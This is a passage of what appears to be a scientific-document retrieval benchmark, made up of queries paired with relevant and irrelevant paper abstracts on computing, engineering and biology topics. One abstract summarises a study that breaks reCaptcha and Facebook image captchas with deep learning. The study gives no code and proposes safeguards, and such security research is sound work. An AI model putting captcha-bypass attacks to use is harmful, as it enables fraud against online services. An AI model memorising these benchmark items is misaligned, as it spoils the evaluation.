"text": "Automatic emotion recognition is a challenging task which can make great impact on improving natural human computer interactions. In this paper, we present our effort for the Affect Subtask in the Audio/Visual Emotion Challenge (AVEC) 2017, which requires participants to perform continuous emotion prediction on three affective dimensions: Arousal, Valence and Likability based on the audiovisual signals. We highlight three aspects of our solutions: 1) we explore and fuse different hand-crafted and deep learned features from all available modalities including acoustic, visual, and textual modalities, and we further consider the interlocutor influence for the acoustic features; 2) we compare the effectiveness of non-temporal model SVR and temporal model LSTM-RNN and show that the LSTM-RNN can not only alleviate the feature engineering efforts such as construction of contextual features and feature delay, but also improve the recognition performance significantly; 3) we apply multi-task learning strategy for collaborative prediction of multiple emotion dimensions with shared representations according to the fact that different emotion dimensions are correlated with each other. Our solutions achieve the CCC of 0.675, 0.756 and 0.509 on arousal, valence, and likability respectively on the challenge testing set, which outperforms the baseline system with corresponding CCC of 0.375, 0.466, and 0.246 on arousal, valence, and likability.",
"title": ""
},
{
"docid": "a0f24500f3729b0a2b6e562114eb2a45",
"text": "In this work, the smallest reported inkjet-printed UWB antenna is proposed that utilizes a fractal matching network to increase the performance of a UWB microstrip monopole. The antenna is inkjet-printed on a paper substrate to demonstrate the ability to produce small and low-cost UWB antennas with inkjet-printing technology which can enable compact, low-cost, and environmentally friendly wireless sensor network.",
"title": ""
},
{
"docid": "25ca6416d95398eb0e79c1357dcf6554",
"text": "Bayesian Learning with Dependency Structures via Latent Factors, Mixtures, and Copulas by Shaobo Han Department of Electrical and Computer Engineering Duke University Date: Approved: Lawrence Carin, Supervisor",
"title": ""
},
{
"docid": "c983e94a5334353ec0e2dabb0e95d92a",
"text": "Digital family calendars have the potential to help families coordinate, yet they must be designed to easily fit within existing routines or they will simply not be used. To understand the critical factors affecting digital family calendar design, we extended LINC, an inkable family calendar to include ubiquitous access, and then conducted a month-long field study with four families. Adoption and use of LINC during the study demonstrated that LINC successfully supported the families' existing calendaring routines without disrupting existing successful social practices. Families also valued the additional features enabled by LINC. For example, several primary schedulers felt that ubiquitous access positively increased involvement by additional family members in the calendaring routine. The field trials also revealed some unexpected findings, including the importance of mobility---both within and outside the home---for the Tablet PC running LINC.",
"title": ""
},
{
"docid": "26b77bf67e242ff3e88a6f6bf7137d3e",
"text": "In the recent years there has been growing interest in exploiting multibaseline (MB) SAR interferometry in a tomographic framework, to produce full 3D imaging e.g. of forest layers. However, Fourier-based MB SAR tomography is generally affected by unsatisfactory imaging quality due to a typically low number of baselines and their irregular distribution. In this work, we apply the more modern adaptive Capon spectral estimator to the vertical image reconstruction problem, using real airborne MB data. A first demonstration of possible imaging enhancement in real-world conditions is given. Keywordssynthetic aperture radar interferometry, electromagnetic tomography, forestry, spectral analysis.",
"title": ""
},
{
"docid": "d3c491249b7df18b3ab993480d63e6d0",
"text": "There has been an increase in the number of colorimetric assay techniques for the determination of protein concentration over the past 20 years. This has resulted in a perceived increase in sensitivity and accuracy with the advent of new techniques. The present review considers these advances with emphasis on the potential use of such technologies in the assay of biopharmaceuticals. The techniques reviewed include Coomassie Blue G-250 dye binding (the Bradford assay), the Lowry assay, the bicinchoninic acid assay and the biuret assay. It is shown that each assay has advantages and disadvantages relative to sensitivity, ease of performance, acceptance in the literature, accuracy and reproducibility/coefficient of variation/laboratory-to-laboratory variation. A comparison of the use of several assays with the same sample population is presented. It is suggested that the most critical issue in the use of a chromogenic protein assay for the characterization of a biopharmaceutical is the selection of a standard for the calibration of the assay; it is crucial that the standard be representative of the sample. If it is not possible to match the standard with the sample from the perspective of protein composition, then it is preferable to use an assay that is not sensitive to the composition of the protein such as a micro-Kjeldahl technique, quantitative amino acid analysis or the biuret assay. In a complex mixture it might be inappropriate to focus on a general method of protein determination and much more informative to use specific methods relating to the protein(s) of particular interest, using either specific assays or antibody-based methods. The key point is that whatever method is adopted as the 'gold standard' for a given protein, this method needs to be used routinely for calibration.",
"title": ""
},
{
"docid": "a981db3aa149caec10b1824c82840782",
"text": "It has been suggested that the performance of a team is determined by the team members’ roles. An analysis of the performance of 342 individuals organised into 33 teams indicates that team roles characterised by creativity, co-ordination and cooperation are positively correlated with team performance. Members of developed teams exhibit certain performance enhancing characteristics and behaviours. Amongst the more developed teams there is a positive relationship between Specialist Role characteristics and team performance. While the characteristics associated with the Coordinator Role are also positively correlated with performance, these can impede the performance of less developed teams.",
"title": ""
},
{
"docid": "a0501b0b3ba110692f9b162ce5f72c05",
"text": "RDF and related Semantic Web technologies have been the recent focus of much research activity. This work has led to new specifications for RDF and OWL. However, efficient implementations of these standards are needed to realize the vision of a world-wide semantic Web. In particular, implementations that scale to large, enterprise-class data sets are required. Jena2 is the second generation of Jena, a leading semantic web programmers’ toolkit. This paper describes the persistence subsystem of Jena2 which is intended to support large datasets. This paper describes its features, the changes from Jena1, relevant details of the implementation and performance tuning issues. Query optimization for RDF is identified as a promising area for future research.",
"title": ""
},
{
"docid": "e35cc74485629dd33995cb7567c3052b",
"text": "One of the fundamental objectives of Computer Science is to reduce the menial, repetitive and mundane tasks. It might be arithmetic calculations or maintaining huge amount of data. With the advent of Artificial Intelligence and Machine Learning, we are a step ahead. We not only make the machine perform these tasks but also those which would require the intelligence and the reasoning of a human brain. This involves decision making, interpretation and prediction. The project makes an attempt to minimize human intervention in a wide range of domains. The tool that is built is capable of having human-like conversations with a person. Currently, the conversational model built is capable of having casual conversations in a variety of topics which involve no domain specific knowledge. The same can be replicated in a domain specific environment by including the previous conversations or data of that specific domain. The concepts of Machine Learning and Artificial Intelligence i.e., Recurrent Neural Networks along with LSTMs (Long Short Term Memory) are used to train the neural network. Keywords—Recurrent Neural Networks, Chatbot, Machine Consciousness.",
"title": ""
},
{
"docid": "c14fdd0f98260fe5947cfddc72a95a92",
"text": "Low-power sensing technologies have emerged for acquiring physiologically indicative patient signals. However, to enable devices with high clinical value, a critical requirement is the ability to analyze the signals to extract specific medical information. Yet given the complexities of the underlying processes, signal analysis poses numerous challenges. Data-driven methods based on machine learning offer distinct solutions, but unfortunately the computations are not well supported by traditional DSP. This paper presents a custom processor that integrates a CPU with configurable accelerators for discriminative machine-learning functions. A support-vector-machine accelerator realizes various classification algorithms as well as various kernel functions and kernel formulations, enabling range of points within an accuracy-versus-energy and -memory trade space. An accelerator for embedded active learning enables prospective adaptation of the signal models by utilizing sensed data for patient-specific customization, while minimizing the effort from human experts. The prototype is implemented in 130-nm CMOS and operates from 1.2 V-0.55 V (0.7 V for SRAMs). Medical applications for EEG-based seizure detection and ECG-based cardiac-arrhythmia detection are demonstrated using clinical data, while consuming 273 μJ and 124 μJ per detection, respectively; this represents 62.4× and 144.7× energy reduction compared to an implementation based on the CPU. A patient-adaptive cardiac-arrhythmia detector is also demonstrated, reducing the analysis-effort required for model customization by 20 ×.",
"title": ""
}
] | scidocsrr |
a764fa620d332512e53b59058336f383 | Vacant Parking Space Detection in Static | [
{
"docid": "13d94a3afd97c4c5f8839652c58ab05f",
"text": "We present an approach for learning to detect objects in still gray images, that is based on a sparse, part-based representation of objects. A vocabulary of information-rich object parts is automatically constructed from a set of sample images of the object class of interest. Images are then represented using parts from this vocabulary, along with spatial relations observed among them. Based on this representation, a feature-efficient learning algorithm is used to learn to detect instances of the object class. The framework developed can be applied to any object with distinguishable parts in a relatively fixed spatial configuration. We report experiments on images of side views of cars. Our experiments show that the method achieves high detection accuracy on a difficult test set of real-world images, and is highly robust to partial occlusion and background variation. In addition, we discuss and offer solutions to several methodological issues that are significant for the research community to be able to evaluate object detection",
"title": ""
},
{
"docid": "14520419a4b0e27df94edc4cf23cde65",
"text": "In this paper we propose and examine non–parametric statistical tests to define similarity and homogeneity measure s for textures. The statistical tests are applied to the coeffi cients of images filtered by a multi–scale Gabor filter bank. We will demonstrate that these similarity measures are useful for both, texture based image retrieval and for unsupervised texture segmentation, and hence offer an unified approach to these closely related tasks. We present results on Brodatz–like micro–textures and a collection of real–word images.",
"title": ""
}
] | [
{
"docid": "7247eb6b90d23e2421c0d2500359d247",
"text": "The large-scale collection and exploitation of personal information to drive targeted online advertisements has raised privacy concerns. As a step towards understanding these concerns, we study the relationship between how much information is collected and how valuable it is for advertising. We use HTTP traces consisting of millions of users to aid our study and also present the first comparative study between aggregators. We develop a simple model that captures the various parameters of today's advertising revenues, whose values are estimated via the traces. Our results show that per aggregator revenue is skewed (5% accounting for 90% of revenues), while the contribution of users to advertising revenue is much less skewed (20% accounting for 80% of revenue). Google is dominant in terms of revenue and reach (presence on 80% of publishers). We also show that if all 5% of the top users in terms of revenue were to install privacy protection, with no corresponding reaction from the publishers, then the revenue can drop by 30%.",
"title": ""
},
{
"docid": "59445fae343192fb6a95b57e0801dd0b",
"text": "Online anomaly detection is an important step in data center management, requiring light-weight techniques that provide sufficient accuracy for subsequent diagnosis and management actions. This paper presents statistical techniques based on the Tukey and Relative Entropy statistics, and applies them to data collected from a production environment and to data captured from a testbed for multi-tier web applications running on server class machines. The proposed techniques are lightweight and improve over standard Gaussian assumptions in terms of performance.",
"title": ""
},
{
"docid": "a2cbc2b95b1988dae97d501c141e161d",
"text": "We present a fast and simple method to compute bundled layouts of general graphs. For this, we first transform a given graph drawing into a density map using kernel density estimation. Next, we apply an image sharpening technique which progressively merges local height maxima by moving the convolved graph edges into the height gradient flow. Our technique can be easily and efficiently implemented using standard graphics acceleration techniques and produces graph bundlings of similar appearance and quality to state-of-the-art methods at a fraction of the cost. Additionally, we show how to create bundled layouts constrained by obstacles and use shading to convey information on the bundling quality. We demonstrate our method on several large graphs.",
"title": ""
},
{
"docid": "ecce348941aeda57bd66dbd7836923e6",
"text": "Moana (2016) continues a tradition of Disney princess movies that perpetuate gender stereotypes. The movie contains the usual Electral undercurrent, with Moana seeking to prove her independence to her overprotective father. Moana’s partner in her adventures, Maui, is overtly hypermasculine, a trait epitomized by a phallic fishhook that is critical to his identity. Maui’s struggles with shapeshifting also reflect male anxieties about performing masculinity. Maui violates the Mother Island, first by entering her cave and then by using his fishhook to rob her of her fertility. The repercussions of this act are the basis of the plot: the Mother Island abandons her form as a nurturing, youthful female (Te Fiti) focused on creation to become a vengeful lava monster (Te Kā). At the end, Moana successfully urges Te Kā to get in touch with her true self, a brave but simple act that is sufficient to bring back Te Fiti, a passive, smiling green goddess. The association of youthful, fertile females with good and witch-like infertile females with evil implies that women’s worth and well-being are dependent upon their procreative function. Stereotypical gender tropes that also include female abuse of power and a narrow conception of masculinity merit analysis in order to further progress in recognizing and addressing patterns of gender hegemony in popular Disney films.",
"title": ""
},
{
"docid": "44b44e400b44f3f83b698f9492e5c8b7",
"text": "Word vector representation techniques, built on word-word co-occurrence statistics, often provide representations that decode the differences in meaning between various words. This significant fact is a powerful tool that can be exploited to a great deal of natural language processing tasks. In this work, we propose a simple and efficient unsupervised approach for keyphrase extraction, called Reference Vector Algorithm (RVA) which utilizes a local word vector representation by applying the GloVe method in the context of one scientific publication at a time. Then, the mean word vector (reference vector) of the article’s abstract guides the candidate keywords’ selection process, using the cosine similarity. The experimental results that emerged through a thorough evaluation process show that our method outperforms the state-of-the-art methods by providing high quality keyphrases in most cases, proposing in this way an additional mode for the exploitation of GloVe word vectors.",
"title": ""
},
{
"docid": "23d85b55654147eeac8c25ded8a87ccb",
"text": "This paper gives the design of Yagi-Uda antenna using microstrip circuit. Microstip circuits are used to implement Yagi-Uda antenna so as to reduce the size but here we have shown only two optimization technique. This has been done by varying the length, width and spacing between reflector, driven element and directors. Simulations are conducted to show how return loss and other parameters vary by varying the above mentioned Yagi-Uda parameters. This antenna is operating very near to resonant frequency fr = 2. 4 GHz with the specification relative permittivity ?r= 3. 2, height of substrate h=1. 6mm, characteristic impedance Z0 = 50 ohm and thickness of strip conductor t=35um. In this paper, two most approximate results after all these perturbations are analyzed and simulations showing return loss and other parameters like directivity, gain and power radiated are discussed. The simulation process has been done using Advanced Design System (ADS) tool.",
"title": ""
},
{
"docid": "1e57a3da54c0d37bc47134961feaf981",
"text": "Software Development Life Cycle (SDLC) is a process consisting of various phases like requirements analysis, designing, coding, testing and implementation & maintenance of a software system as well as the way, in which these phases are implemented. Research studies reveal that the initial two phases, viz. requirements and design are the skeleton of the entire development life cycle. Designing has several sub-activities such as Architectural, Function-Oriented and Object- Oriented design, which aim to transform the requirements into detailed specifications covering all facets of the system in a proper way, but at the same time, there exists various related challenges too. One of the foremost challenges is the minimum interaction between construction and design teams causing numerous problems during design such as: production delays, incomplete designs, rework, change orders, etc. Prior research studies reveal that Artificial Intelligence (AI) techniques may eliminate these problems by offering several tools/techniques to automate certain processes up to a certain extent. In this paper, our major aim is to identify the challenges in each of the stages of the design phase and possibility of AI techniques to overcome these identified issues. In addition, the paper also explores the relationship between these issues and their possible AI solution/s through Venn-Diagram. For some of the issues, there exist more than one AI techniques but for some issues, no AI technique/s have been found to overcome the same and accordingly, those issues are still open for further research.",
"title": ""
},
{
"docid": "be86e9eb8227340213627f1fb1012f52",
"text": "Animal studies have shown that a periodontal ligament may be produced around a titanium implant when it is in contact with fractured and retained roots. Formation of cementum and attachment connective tissue around titanium implants confirms that cementum progenitor cells are located in the periodontal ligament, since cementum and periodontal ligament are present at the implant-root interface, whereas the remainder of the implant, which is not in contact with the root, shows osseointegration. The aim was to evaluate histologically the characteristics of the tissue present between a titanium implant and a retained root, which were subsequently extracted as a result of peri-implantitis. The histologic examination revealed a continuous layer of cementum and numerous cementocytes on the implant surface. No blood vessel or collagen fibers were detected in the periodontal space. In contrast to experimental studies carried out on animals, the lack of connective tissue fibers and the presence of hypercementosis in this specimen could have been caused by the inflammatory process. Furthermore, the extrusive movement of the root might explain the presence of cementum hypertrophy. Further studies are required to establish whether the neoformation of cementum and collagen fibers on an implant in the presence of root residues occurs only in animal models or whether it may also occur in humans.",
"title": ""
},
{
"docid": "c7daf28d656a9e51e5a738e70beeadcf",
"text": "We present a taxonomy for Information Visualization (IV) that characterizes it in terms of data, task, skill and context, as well as a number of dimensions that relate to the input and output hardware, the software tools, as well as user interactions and human perceptual abil ities. We il lustrate the utilit y of the taxonomy by focusing particularly on the information retrieval task and the importance of taking into account human perceptual capabiliti es and limitations. Although the relevance of Psychology to IV is often recognised, we have seen relatively littl e translation of psychological results and theory to practical IV applications. This paper targets the better development of information visualizations through the introduction of a framework delineating the major factors in interface development. We believe that higher quality visualizations will result from structured developments that take into account these considerations and that the framework will also serve to assist the development of effective evaluation and assessment processes.",
"title": ""
},
{
"docid": "ae607090eaca242af95227d8788d1a49",
"text": "As systems become more service oriented and processes increasingly cross organizational boundaries, interaction becomes more important. New technologies support the development of such systems. However, the paradigm shift towards service orientation, requires a fundamentally different way of looking at processes. This survey aims to provide some foundational notions related to service interaction. A set of service interaction patterns is given to illustrate the challenges in this domain. Moreover, key results are given for three of these challenges: (1) How to expose a service?, (2) How to replace and refine services?, and (3) How to generate service adapters? These challenges will be addressed in a Petri net setting. However, the results extend to other languages used in this domain.",
"title": ""
},
{
"docid": "cf0b692c3084713b3d3a98e4954d994f",
"text": "Genome instability, defined as higher than normal rates of mutation, is a double-edged sword. As a source of genetic diversity and natural selection, mutations are beneficial for evolution. On the other hand, genomic instability can have catastrophic consequences for age-related diseases such as cancer. Mutations arise either from inactivation of DNA repair pathways or in a repair-competent background due to genotoxic stress from celluar processes such as transcription and replication that overwhelm high-fidelity DNA repair. Here, we review recent studies that shed light on endogenous sources of mutation and epigenomic features that promote genomic instability during cancer evolution.",
"title": ""
},
{
"docid": "eb91cfce08dd5e17599c18e3b291db3e",
"text": "The extraordinary electronic properties of graphene provided the main thrusts for the rapid advance of graphene electronics. In photonics, the gate-controllable electronic properties of graphene provide a route to efficiently manipulate the interaction of photons with graphene, which has recently sparked keen interest in graphene plasmonics. However, the electro-optic tuning capability of unpatterned graphene alone is still not strong enough for practical optoelectronic applications owing to its non-resonant Drude-like behaviour. Here, we demonstrate that substantial gate-induced persistent switching and linear modulation of terahertz waves can be achieved in a two-dimensional metamaterial, into which an atomically thin, gated two-dimensional graphene layer is integrated. The gate-controllable light-matter interaction in the graphene layer can be greatly enhanced by the strong resonances of the metamaterial. Although the thickness of the embedded single-layer graphene is more than six orders of magnitude smaller than the wavelength (<λ/1,000,000), the one-atom-thick layer, in conjunction with the metamaterial, can modulate both the amplitude of the transmitted wave by up to 47% and its phase by 32.2° at room temperature. More interestingly, the gate-controlled active graphene metamaterials show hysteretic behaviour in the transmission of terahertz waves, which is indicative of persistent photonic memory effects.",
"title": ""
},
{
"docid": "c89de16110a66d65f8ae7e3476fe90ef",
"text": "In this paper, a new notion which we call private data deduplication protocol, a deduplication technique for private data storage is introduced and formalized. Intuitively, a private data deduplication protocol allows a client who holds a private data proves to a server who holds a summary string of the data that he/she is the owner of that data without revealing further information to the server. Our notion can be viewed as a complement of the state-of-the-art public data deduplication protocols of Halevi et al [7]. The security of private data deduplication protocols is formalized in the simulation-based framework in the context of two-party computations. A construction of private deduplication protocols based on the standard cryptographic assumptions is then presented and analyzed. We show that the proposed private data deduplication protocol is provably secure assuming that the underlying hash function is collision-resilient, the discrete logarithm is hard and the erasure coding algorithm can erasure up to α-fraction of the bits in the presence of malicious adversaries in the presence of malicious adversaries. To the best our knowledge this is the first deduplication protocol for private data storage.",
"title": ""
},
{
"docid": "6c3c88705b06657ae1ac4c9ff37e5263",
"text": "The Generative Adversarial Networks (GANs) have demonstrated impressive performance for data synthesis, and are now used in a wide range of computer vision tasks. In spite of this success, they gained a reputation for being difficult to train, what results in a time-consuming and human-involved development process to use them. We consider an alternative training process, named SGAN, in which several adversarial \"local\" pairs of networks are trained independently so that a \"global\" supervising pair of networks can be trained against them. The goal is to train the global pair with the corresponding ensemble opponent for improved performances in terms of mode coverage. This approach aims at increasing the chances that learning will not stop for the global pair, preventing both to be trapped in an unsatisfactory local minimum, or to face oscillations often observed in practice. To guarantee the latter, the global pair never affects the local ones. The rules of SGAN training are thus as follows: the global generator and discriminator are trained using the local discriminators and generators, respectively, whereas the local networks are trained with their fixed local opponent. Experimental results on both toy and real-world problems demonstrate that this approach outperforms standard training in terms of better mitigating mode collapse, stability while converging and that it surprisingly, increases the convergence speed as well.",
"title": ""
},
{
"docid": "331c9dfa628f2bd045b6e0ad643a4d33",
"text": "What is most evident in the recent debate concerning new wetland regulations drafted by the U.S. Army Corps of Engineers is that small, isolated wetlands will likely continue to be lost. The critical biological question is whether small wetlands are expendable, and the fundamental issue is the lack of biologically relevant data on the value of wetlands, especially so-called “isolated” wetlands of small size. We used data from a geographic information system for natural-depression wetlands on the southeastern Atlantic coastal plain (U.S.A.) to examine the frequency distribution of wetland sizes and their nearest-wetland distances. Our results indicate that the majority of natural wetlands are small and that these small wetlands are rich in amphibian species and serve as an important source of juvenile recruits. Analyses simulating the loss of small wetlands indicate a large increase in the nearest-wetland distance that could impede “rescue” effects at the metapopulation level. We argue that small wetlands are extremely valuable for maintaining biodiversity, that the loss of small wetlands will cause a direct reduction in the connectance among remaining species populations, and that both existing and recently proposed legislation are inadequate for maintaining the biodiversity of wetland flora and fauna. Small wetlands are not expendable if our goal is to maintain present levels of species biodiversity. At the very least, based on these data, regulations should protect wetlands as small as 0.2 ha until additional data are available to compare diversity directly across a range of wetland sizes. Furthermore, we strongly advocate that wetland legislation focus not only on size but also on local and regional wetland distribution in order to protect ecological connectance and the source-sink dynamics of species populations. Son los Humedales Pequeños Prescindibles? Resumen: Algo muy evidente en el reciente debate sobre las nuevas regulaciones de humedales elaboradas por el cuerpo de ingenieros de la armada de los Estados Unidos es que los humedales aislados pequeños seguramente se continuarán perdiendo. La pregunta biológica crítica es si los humedales pequeños son prescindibles y e asunto fundamental es la falta de datos biológicos relevantes sobre el valor de los humedales, especialmente los llamados humedales “aislados” de tamaño pequeño. Utilizamos datos de GIS para humedales de depresiones naturales en la planicie del sureste de la costa Atlántica (U.S.A.) para examinar la distribución de frecuencias de los tamaños de humedales y las distancias a los humedales mas cercanos. Nuestros resultados indican que la mayoría de los humedales naturales son pequeños y que estos humedales pequeños son ricos en especies de anfibios y sirven como una fuente importante de reclutas juveniles. Análisis simulando la pérdida de humedales pequeños indican un gran incremento en la distancia al humedal mas cercano lo cual impediría efectos de “rescate” a nivel de metapoblación. Argumentamos que los humedales pequeños son extremadamente valiosos para el mantenimiento de la biodiversidad, que la pérdida de humedales pequeños causará una reducción directa en la conexión entre poblaciones de especies remanentes y que tanto la legislación propuesta como la existente son inadecuadas para mantener la biodiversidad de la flora y fauna de los humedales. Si nuestra meta es mantener los niveles actuales de biodiversidad de especies, los humedales pequeños no son prescindibles. 
En base en estos datos, las regulaciones deberían por lo menos proteger humedales tan pequeños como 0.2 ha hasta que se tengan a la mano datos adicionales para comPaper submitted April 1, 1998; revised manuscript accepted June 24, 1998. 1130 Expendability of Small Wetlands Semlitsch & Bodie Conservation Biology Volume 12, No. 5, October 1998 parar directamente la diversidad a lo largo de un rango de humedales de diferentes tamaños. Mas aún, abogamos fuertemente por que la regulación de los pantanos se enfoque no solo en el tamaño, sino también en la distribución local y regional de los humedales para poder proteger la conexión ecológica y las dinámicas fuente y sumidero de poblaciones de especies.",
"title": ""
},
{
"docid": "46ef5b489f02a1b62b0fb78a28bfc32c",
"text": "Biobanks have been heralded as essential tools for translating biomedical research into practice, driving precision medicine to improve pathways for global healthcare treatment and services. Many nations have established specific governance systems to facilitate research and to address the complex ethical, legal and social challenges that they present, but this has not lead to uniformity across the world. Despite significant progress in responding to the ethical, legal and social implications of biobanking, operational, sustainability and funding challenges continue to emerge. No coherent strategy has yet been identified for addressing them. This has brought into question the overall viability and usefulness of biobanks in light of the significant resources required to keep them running. This review sets out the challenges that the biobanking community has had to overcome since their inception in the early 2000s. The first section provides a brief outline of the diversity in biobank and regulatory architecture in seven countries: Australia, Germany, Japan, Singapore, Taiwan, the UK, and the USA. The article then discusses four waves of responses to biobanking challenges. This article had its genesis in a discussion on biobanks during the Centre for Health, Law and Emerging Technologies (HeLEX) conference in Oxford UK, co-sponsored by the Centre for Law and Genetics (University of Tasmania). This article aims to provide a review of the issues associated with biobank practices and governance, with a view to informing the future course of both large-scale and smaller scale biobanks.",
"title": ""
},
{
"docid": "9faf67646394dfedfef1b6e9152d9cf6",
"text": "Acoustic shooter localization systems are being rapidly deployed in the field. However, these are standalone systems---either wearable or vehicle-mounted---that do not have networking capability even though the advantages of widely distributed sensing for locating shooters have been demonstrated before. The reason for this is that certain disadvantages of wireless network-based prototypes made them impractical for the military. The system that utilized stationary single-channel sensors required many sensor nodes, while the multi-channel wearable version needed to track the absolute self-orientation of the nodes continuously, a notoriously hard task. This paper presents an approach that overcomes the shortcomings of past approaches. Specifically, the technique requires as few as five single-channel wireless sensors to provide accurate shooter localization and projectile trajectory estimation. Caliber estimation and weapon classification are also supported. In addition, a single node alone can provide reliable miss distance and range estimates based on a single shot as long as a reasonable assumption holds. The main contribution of the work and the focus of this paper is the novel sensor fusion technique that works well with a limited number of observations. The technique is thoroughly evaluated using an extensive shot library.",
"title": ""
},
{
"docid": "afcde1fb33c3e36f35890db09c548a1f",
"text": "Since their inception, captchas have been widely used for preventing fraudsters from performing illicit actions. Nevertheless, economic incentives have resulted in an arms race, where fraudsters develop automated solvers and, in turn, captcha services tweak their design to break the solvers. Recent work, however, presented a generic attack that can be applied to any text-based captcha scheme. Fittingly, Google recently unveiled the latest version of reCaptcha. The goal of their new system is twofold; to minimize the effort for legitimate users, while requiring tasks that are more challenging to computers than text recognition. ReCaptcha is driven by an “advanced risk analysis system” that evaluates requests and selects the difficulty of the captcha that will be returned. Users may be required to click in a checkbox, or solve a challenge by identifying images with similar content. In this paper, we conduct a comprehensive study of reCaptcha, and explore how the risk analysis process is influenced by each aspect of the request. Through extensive experimentation, we identify flaws that allow adversaries to effortlessly influence the risk analysis, bypass restrictions, and deploy large-scale attacks. Subsequently, we design a novel low-cost attack that leverages deep learning technologies for the semantic annotation of images. Our system is extremely effective, automatically solving 70.78% of the image reCaptcha challenges, while requiring only 19 seconds per challenge. We also apply our attack to the Facebook image captcha and achieve an accuracy of 83.5%. Based on our experimental findings, we propose a series of safeguards and modifications for impacting the scalability and accuracy of our attacks. Overall, while our study focuses on reCaptcha, our findings have wide implications; as the semantic information conveyed via images is increasingly within the realm of automated reasoning, the future of captchas relies on the exploration of novel directions.",
"title": ""
},
{
"docid": "d8982dd146a28c7d2779c781f7110ed5",
"text": "We consider the budget optimization problem faced by an advertiser participating in repeated sponsored search auctions, seeking to maximize the number of clicks attained under that budget. We cast the budget optimization problem as a Markov Decision Process (MDP) with censored observations, and propose a learning algorithm based on the wellknown Kaplan-Meier or product-limit estimator. We validate the performance of this algorithm by comparing it to several others on a large set of search auction data from Microsoft adCenter, demonstrating fast convergence to optimal performance.",
"title": ""
},
{
"docid": "caed1f75d310571b386b9ff2590e8662",
"text": "This video presents a humanoid two-arm system developed as a research platform for studying dexterous two-handed manipulation. The system is based on the modular DLR-Lightweight-Robot-III and the DLR-Hand-II. Two arms and hands are combined with a three degrees-of-freedom movable torso and a visual system to form a complete humanoid upper body. The diversity of the system is demonstrated by showing the mechanical design, several control concepts, the application of rapid prototyping and hardware-in-the-loop (HIL) development as well as two-handed manipulation experiments and the integration of path planning capabilities.",
"title": ""
}
] | scidocsrr |
620992cde18533a7c5166dff0f0c5393 | ASCII Art Synthesis from Natural Photographs | [
{
"docid": "457e2f2583a94bf8b6f7cecbd08d7b34",
"text": "We present a fast structure-based ASCII art generation method that accepts arbitrary images (real photograph or hand-drawing) as input. Our method supports not only fixed width fonts, but also the visually more pleasant and computationally more challenging proportional fonts, which allows us to represent challenging images with a variety of structures by characters. We take human perception into account and develop a novel feature extraction scheme based on a multi-orientation phase congruency model. Different from most existing contour detection methods, our scheme does not attempt to remove textures as much as possible. Instead, it aims at faithfully capturing visually sensitive features, including both main contours and textural structures, while suppressing visually insensitive features, such as minor texture elements and noise. Together with a deformation-tolerant image similarity metric, we can generate lively and meaningful ASCII art, even when the choices of character shapes and placement are very limited. A dynamic programming based optimization is proposed to simultaneously determine the optimal proportional-font characters for matching and their optimal placement. Experimental results show that our results outperform state-of-the-art methods in term of visual quality.",
"title": ""
}
] | [
{
"docid": "c6baff0d600c76fac0be9a71b4238990",
"text": "Nature has provided rich models for computational problem solving, including optimizations based on the swarm intelligence exhibited by fireflies, bats, and ants. These models can stimulate computer scientists to think nontraditionally in creating tools to address application design challenges.",
"title": ""
},
{
"docid": "d42f5fdbcaf8933dc97b377a801ef3e0",
"text": "Bodyweight supported treadmill training has become a prominent gait rehabilitation method in leading rehabilitation centers. This type of locomotor training has many functional benefits but the labor costs are considerable. To reduce therapist effort, several groups have developed large robotic devices for assisting treadmill stepping. A complementary approach that has not been adequately explored is to use powered lower limb orthoses for locomotor training. Recent advances in robotic technology have made lightweight powered orthoses feasible and practical. An advantage to using powered orthoses as rehabilitation aids is they allow practice starting, turning, stopping, and avoiding obstacles during overground walking.",
"title": ""
},
{
"docid": "a21d1956026b29bc67b92f8508a62e1c",
"text": "We introduce several new formulations for sparse nonnegative matrix approximation. Subsequently, we solve these formulations by developing generic algorithms. Further, to help selecting a particular sparse formulation, we briefly discuss the interpretation of each formulation. Finally, preliminary experiments are presented to illustrate the behavior of our formulations and algorithms.",
"title": ""
},
{
"docid": "fbd95124640b54a594f29871df4d5a5c",
"text": "Gradable adjectives denote a function that takes an object and returns a measure of the degree to which the object possesses some gradable property [Kennedy, C. (1999). Projecting the adjective: The syntax and semantics of gradability and comparison. New York: Garland]. Scales, ordered sets of degrees, have begun to be studied systematically in semantics [Kennedy, C. (to appear). Vagueness and grammar: the semantics of relative and absolute gradable predicates. Linguistics and Philosophy; Kennedy, C. and McNally, L. (2005). Scale structure, degree modification, and the semantics of gradable predicates. Language, 81, 345-381; Rotstein, C., and Winter, Y. (2004). Total adjectives vs. partial adjectives: scale structure and higher order modifiers. Natural Language Semantics, 12, 259-288.]. We report four experiments designed to investigate the processing of absolute adjectives with a maximum standard (e.g., clean) and their minimum standard antonyms (dirty). The central hypothesis is that the denotation of an absolute adjective introduces a 'standard value' on a scale as part of the normal comprehension of a sentence containing the adjective (the \"Obligatory Scale\" hypothesis). In line with the predictions of Kennedy and McNally (2005) and Rotstein and Winter (2004), maximum standard adjectives and minimum standard adjectives systematically differ from each other when they are combined with minimizing modifiers like slightly, as indicated by speeded acceptability judgments. An eye movement recording study shows that, as predicted by the Obligatory Scale hypothesis, the penalty due to combining slightly with a maximum standard adjective can be observed during the processing of the sentence; the penalty is not the result of some after-the-fact inferencing mechanism. Further, a type of 'quantificational variability effect' may be observed when a quantificational adverb (mostly) is combined with a minimum standard adjective in sentences like \"The dishes are mostly dirty\", which may receive either a degree interpretation (e.g., 80% dirty) or a quantity interpretation (e.g., 80% of the dishes are dirty). The quantificational variability results provide suggestive support for the Obligatory Scale hypothesis by showing that the standard of a scalar adjective influences the preferred interpretation of other constituents in the sentence.",
"title": ""
},
{
"docid": "7bdbed53cc467b43eb2653c3a4818a0c",
"text": "Alternative splicing of pre-mRNAs is a major contributor to both proteomic diversity and control of gene expression levels. Splicing is tightly regulated in different tissues and developmental stages, and its disruption can lead to a wide range of human diseases. An important long-term goal in the splicing field is to determine a set of rules or \"code\" for splicing that will enable prediction of the splicing pattern of any primary transcript from its sequence. Outside of the core splice site motifs, the bulk of the information required for splicing is thought to be contained in exonic and intronic cis-regulatory elements that function by recruitment of sequence-specific RNA-binding protein factors that either activate or repress the use of adjacent splice sites. Here, we summarize the current state of knowledge of splicing cis-regulatory elements and their context-dependent effects on splicing, emphasizing recent global/genome-wide studies and open questions.",
"title": ""
},
{
"docid": "d964e7b98a139b1bb936ff94d1100934",
